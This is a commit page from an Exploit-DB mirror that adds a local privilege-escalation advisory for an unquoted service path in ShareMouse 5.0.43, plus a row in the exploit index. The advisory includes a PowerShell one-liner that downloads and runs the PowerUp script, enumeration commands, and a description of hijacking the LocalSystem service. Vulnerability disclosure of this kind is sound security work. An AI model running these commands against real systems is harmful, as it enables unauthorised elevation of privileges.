bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-09-09

Browse source 
1 changes to exploits/shellcodes

ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
This commit is contained in:
Offensive Security 2020-09-09 05:02:07 +00:00
parent f288c52ef9
commit 39b0da41ed
2 changed files with 26 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

25
exploits/windows/local/48794.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
# Discovery Date: 2020-09-08
# Discovery by: Alan Lacerda (alacerda)
# Vendor Homepage: https://www.sharemouse.com/
# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe
# Version: 5.0.43
# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041
PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing);
PS > Invoke-AllChecks
ServiceName : ShareMouse Service
Path : C:\Program Files (x86)\ShareMouse\smService.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath>
PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName
AcceptStop DisplayName PathName StartName
TRUE ShareMouse Service C:\Program Files (x86)\ShareMouse\smService.exe LocalSystem
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.

1
files_exploits.csv
View file

@ -10374,6 +10374,7 @@ id,file,description,date,author,type,platform,port
42735,exploits/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",local,windows,
42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,local,windows,
48790,exploits/windows/local/48790.txt,"Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path",2020-09-04,chipo,local,windows,
48794,exploits/windows/local/48794.txt,"ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path",2020-09-08,alacerda,local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,

Can't render this file because it is too large.